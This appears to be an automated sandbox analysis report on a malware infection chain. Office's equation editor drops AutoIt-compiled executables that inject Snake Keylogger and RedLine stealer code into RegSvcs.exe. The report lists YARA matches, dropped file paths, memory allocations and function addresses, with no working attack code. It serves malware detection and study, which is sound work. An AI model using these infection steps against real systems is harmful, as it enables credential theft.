Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dafd640f-6
Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bd735227-d
Source: negrett.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_59ed402a-6
Source: negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e6e71942-0
Source: negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8a996c3d-f
Source: negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2f1f07c6-2
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000008.00000000.773844640.00000000010B2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ef89f19f-6
Source: name.exe, 00000008.00000000.773844640.00000000010B2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c6b2ebc5-6
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 0000000B.00000002.817199516.00000000013F2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_55d6bc35-1
Source: name.exe, 0000000B.00000002.817199516.00000000013F2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a04743ab-d
Source: negrett.exe.2.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b5ac6e26-5
Source: negrett.exe.2.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bd6a790b-0
Source: name.exe.5.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_af25db20-4
Source: name.exe.5.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bd7c0de8-2

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\negrett.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe			Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\negrett.exe

Process Stats: CPU usage > 49%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0105D5EB: CreateFileW,DeviceIoControl,CloseHandle,

8_2_0105D5EB

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\directory\name.exe

8_2_01051201

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	5_2_00B7E8F6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	8_2_0105E8F6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	11_2_0139E8F6

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029EA3AC	5_3_029EA3AC
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A061D9	5_3_02A061D9
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F0794	5_3_029F0794
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029D85C0	5_3_029D85C0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F0B06	5_3_029F0B06
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029EAB31	5_3_029EAB31
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F6E4A	5_3_029F6E4A
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F6C1B	5_3_029F6C1B
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F0DB0	5_3_029F0DB0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029D6D20	5_3_029D6D20
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029E8D7D	5_3_029E8D7D
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A092EE	5_3_02A092EE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A5B244	5_3_02A5B244
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F1332	5_3_029F1332
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029DB340	5_3_029DB340
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F70A7	5_3_029F70A7
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F1077	5_3_029F1077
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A37698	5_3_02A37698
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A41446	5_3_02A41446
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029D7460	5_3_029D7460
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A05B6B	5_3_02A05B6B
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A0D8FF	5_3_02A0D8FF
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029FBEA0	5_3_029FBEA0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029DBEF0	5_3_029DBEF0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A63C73	5_3_02A63C73
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B18060	5_2_00B18060
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B82046	5_2_00B82046
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B78298	5_2_00B78298
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4E4FF	5_2_00B4E4FF
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4676B	5_2_00B4676B
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00BA4873	5_2_00BA4873
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B3CAA0	5_2_00B3CAA0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B1CAF0	5_2_00B1CAF0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B2CC39	5_2_00B2CC39
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B46DD9	5_2_00B46DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FF8060	8_2_00FF8060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01062046	8_2_01062046
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01058298	8_2_01058298
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102E4FF	8_2_0102E4FF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102676B	8_2_0102676B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01084873	8_2_01084873
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FFCAF0	8_2_00FFCAF0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0101CAA0	8_2_0101CAA0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01026DD9	8_2_01026DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100CC39	8_2_0100CC39
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100B119	8_2_0100B119
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FF91C0	8_2_00FF91C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011394	8_2_01011394
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011706	8_2_01011706
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100997D	8_2_0100997D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010119B0	8_2_010119B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0101781B	8_2_0101781B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FF7920	8_2_00FF7920
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01017A4A	8_2_01017A4A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011C77	8_2_01011C77
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01017CA7	8_2_01017CA7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011F32	8_2_01011F32
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0107BE44	8_2_0107BE44
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01029EEE	8_2_01029EEE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_001936F0	8_2_001936F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418244	9_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00401650	9_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004193C4	9_2_004193C4
